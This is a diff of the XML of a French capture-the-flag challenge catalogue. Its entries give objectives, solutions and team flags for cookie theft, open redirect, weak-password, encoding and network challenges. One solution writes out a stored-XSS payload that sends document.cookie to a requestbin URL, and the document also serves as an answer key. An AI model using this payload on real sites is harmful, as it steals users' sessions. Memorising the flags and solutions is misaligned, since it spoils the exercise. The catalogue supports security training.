+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Difficulté de la faille :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Description de la faille : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Volez le cookie de session de l'autre équipe pour valider le flag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Capture d’écran :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1065"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40BA98FB" wp14:editId="518B9A91">
+            <wp:extent cx="5391150" cy="4114800"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="19" name="Image 19"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId32"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
                       <a:ext cx="5391150" cy="4114800"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -12418,69 +12127,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>Injecter ce code dans le chat &lt;script&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>document.write</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>(\'&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>img</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> src=\"http://requestbin.fullcontact.com/1ap2jla1?cookie==\'+document.cookie+\'\"&gt;aaaa&lt;/img&gt;\');&lt;/script&gt; et utiliser un site de récolte de cookie pour récupérer le cookie (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>requestbin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>Injecter ce code dans le chat &lt;script&gt;document.write(\'&lt;img src=\"http://requestbin.fullcontact.com/1ap2jla1?cookie==\'+document.cookie+\'\"&gt;aaaa&lt;/img&gt;\');&lt;/script&gt; et utiliser un site de récolte de cookie pour récupérer le cookie (requestbin)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12909,6 +12556,7 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="50" w:name="_Toc509996639"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
@@ -12916,16 +12564,9 @@
         <w:lastRenderedPageBreak/>
         <w:t>Nom de la faille</w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> : </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>challenge_Gmail</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> / http-025</w:t>
+      <w:bookmarkEnd w:id="50"/>
+      <w:r>
+        <w:t> : challenge_Gmail / http-025</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12933,6 +12574,7 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="51" w:name="_Toc509996640"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
@@ -12943,7 +12585,14 @@
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
-        <w:t>atégorie </w:t>
+        <w:t>atégorie</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="51"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t> </w:t>
       </w:r>
       <w:r>
         <w:t>: http</w:t>
@@ -12954,6 +12603,7 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="52" w:name="_Toc509996641"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
@@ -12964,7 +12614,14 @@
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
-        <w:t>bjectif </w:t>
+        <w:t>bjectif</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="52"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t> </w:t>
       </w:r>
       <w:r>
         <w:t>: Retrouver le Flag dans une boîte mail</w:t>
@@ -12975,12 +12632,14 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="53" w:name="_Toc509996642"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
         <w:t>Description :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="53"/>
       <w:r>
         <w:t xml:space="preserve"> Le challenger doit retrouver le Flag caché dans une boîte mail, il dispose d’une page formulaire qui permet de récupérer les identifiants de connexion de la boîte mail</w:t>
       </w:r>
@@ -12994,9 +12653,11 @@
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="54" w:name="_Toc509996643"/>
       <w:r>
         <w:t>Capture d’écran :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="54"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13024,7 +12685,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId30"/>
+                    <a:blip r:embed="rId33"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -13071,7 +12732,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId31"/>
+                    <a:blip r:embed="rId34"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -13097,12 +12758,14 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="55" w:name="_Toc509996644"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
         <w:t>Solution :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="55"/>
       <w:r>
         <w:t xml:space="preserve"> Inspecter le code de la page formulaire, elle contient les identifiants de la boîte mail, ensuite les flags sont enregistré dans « à conserver » et dans « brouillon ».</w:t>
       </w:r>
@@ -13112,16 +12775,17 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="56" w:name="_Toc509996645"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
         <w:t>Flag team A :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="56"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
@@ -13132,23 +12796,23 @@
         </w:rPr>
         <w:t>cetaitpassiduraufinal</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="57" w:name="_Toc509996646"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
         <w:t>Flag team B :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="57"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
@@ -13159,7 +12823,6 @@
         </w:rPr>
         <w:t>cesttropfacilequandmeme</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13322,19 +12985,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Double </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>password</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Double password</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -13553,6 +13205,7 @@
       <w:pPr>
         <w:ind w:left="705"/>
       </w:pPr>
+      <w:bookmarkStart w:id="58" w:name="_Toc509996647"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
@@ -13560,10 +13213,10 @@
         <w:lastRenderedPageBreak/>
         <w:t>Nom de la faille</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="58"/>
       <w:r>
         <w:t xml:space="preserve"> : </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
@@ -13572,18 +13225,7 @@
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Open_Redirect</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> / http-030</w:t>
+        <w:t>Open_Redirect / http-030</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13591,11 +13233,19 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="59" w:name="_Toc509996648"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
-        <w:t>Catégorie </w:t>
+        <w:t>Catégorie</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="59"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t> </w:t>
       </w:r>
       <w:r>
         <w:t>: http</w:t>
@@ -13606,11 +13256,19 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="60" w:name="_Toc509996649"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
-        <w:t>Objectif </w:t>
+        <w:t>Objectif</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="60"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t> </w:t>
       </w:r>
       <w:r>
         <w:t>: Réussir à faire une redirection vers un autre domaine pour débloquer le flag</w:t>
@@ -13621,12 +13279,14 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="61" w:name="_Toc509996650"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
         <w:t>Description :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="61"/>
       <w:r>
         <w:t xml:space="preserve"> Le challenger doit retrouver le doit trouver le flag en faisant une redirection vers un autre domaine. La page présente 3 boutons vers des sites connus, Facebook, Twitter, et Slack.fr. Les boutons contiennent un lien de redirection qui est associé à un hash de l’adresse</w:t>
       </w:r>
@@ -13640,9 +13300,11 @@
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="62" w:name="_Toc509996651"/>
       <w:r>
         <w:t>Capture d’écran :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="62"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13670,7 +13332,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId32"/>
+                    <a:blip r:embed="rId35"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -13696,12 +13358,14 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="63" w:name="_Toc509996652"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
         <w:t>Solution :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="63"/>
       <w:r>
         <w:t xml:space="preserve"> la redirection se fait seulement si le hash est égal à l’url en claire. Le challengeur doit donc rentrer un nom de domaine imaginaire type toto.com en clair et en hash. Le domaine ne doit pas exister pour permettre d’afficher la page contenant le flag</w:t>
       </w:r>
@@ -13711,16 +13375,17 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="64" w:name="_Toc509996653"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
         <w:t>Flag team A :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="64"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
@@ -13731,23 +13396,23 @@
         </w:rPr>
         <w:t>BatmanestBruceWayne</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="65" w:name="_Toc509996654"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
         <w:t>Flag team B :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="65"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
@@ -13758,7 +13423,6 @@
         </w:rPr>
         <w:t>SupermanestClarkKent</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13819,6 +13483,7 @@
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="66" w:name="_Toc509996655"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
@@ -13826,6 +13491,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>Nom de la faille</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="66"/>
       <w:r>
         <w:t xml:space="preserve"> : </w:t>
       </w:r>
@@ -13861,11 +13527,19 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="67" w:name="_Toc509996656"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
-        <w:t>Catégorie </w:t>
+        <w:t>Catégorie</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="67"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t> </w:t>
       </w:r>
       <w:r>
         <w:t>: http</w:t>
@@ -13876,11 +13550,19 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="68" w:name="_Toc509996657"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
-        <w:t>Objectif </w:t>
+        <w:t>Objectif</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="68"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t> </w:t>
       </w:r>
       <w:r>
         <w:t>: Trouver le mot de passe de connexion de la page</w:t>
@@ -13891,12 +13573,14 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="69" w:name="_Toc509996658"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
         <w:t>Description :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="69"/>
       <w:r>
         <w:t xml:space="preserve"> Le challenger doit retrouver le mot de passe de connexion de la page. Il dispose d’un formulaire de connexion. Le challenge repose sur la logique, aucun indice n’est donné il s’agit de retrouver un mot de passe très faible utilisé par beaucoup de gens</w:t>
       </w:r>
@@ -13906,12 +13590,14 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="70" w:name="_Toc509996659"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
         <w:t>Solution :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="70"/>
       <w:r>
         <w:t xml:space="preserve"> Le mot de passe est un mot de passe qu’on retrouve pour les interfaces d’administration des modems de beaucoup de modem</w:t>
       </w:r>
@@ -13921,12 +13607,14 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="71" w:name="_Toc509996660"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
         <w:t>Flag team A :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="71"/>
       <w:r>
         <w:t xml:space="preserve"> root</w:t>
       </w:r>
@@ -13936,12 +13624,14 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="72" w:name="_Toc509996661"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
         <w:t>Flag team B :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="72"/>
       <w:r>
         <w:t xml:space="preserve"> admin</w:t>
       </w:r>
@@ -14175,27 +13865,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Conversion </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Hex</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> String and String base64</w:t>
+        <w:t>Conversion Hex String and String base64</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14267,7 +13937,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Flag de la faille A : </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -14277,7 +13946,6 @@
         </w:rPr>
         <w:t>Laconversionc'estcoolbravo</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -14298,7 +13966,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Flag de la faille B : </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -14308,7 +13975,6 @@
         </w:rPr>
         <w:t>Laconversionc'estcoolbienjoue</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -14525,27 +14191,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Analysez le </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>traffic</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> réseau et capturez la trame UDP qui s'échappe du serveur ! </w:t>
+        <w:t xml:space="preserve">Analysez le traffic réseau et capturez la trame UDP qui s'échappe du serveur ! </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14890,27 +14536,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Effectuer une attaque de type </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>DDos</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
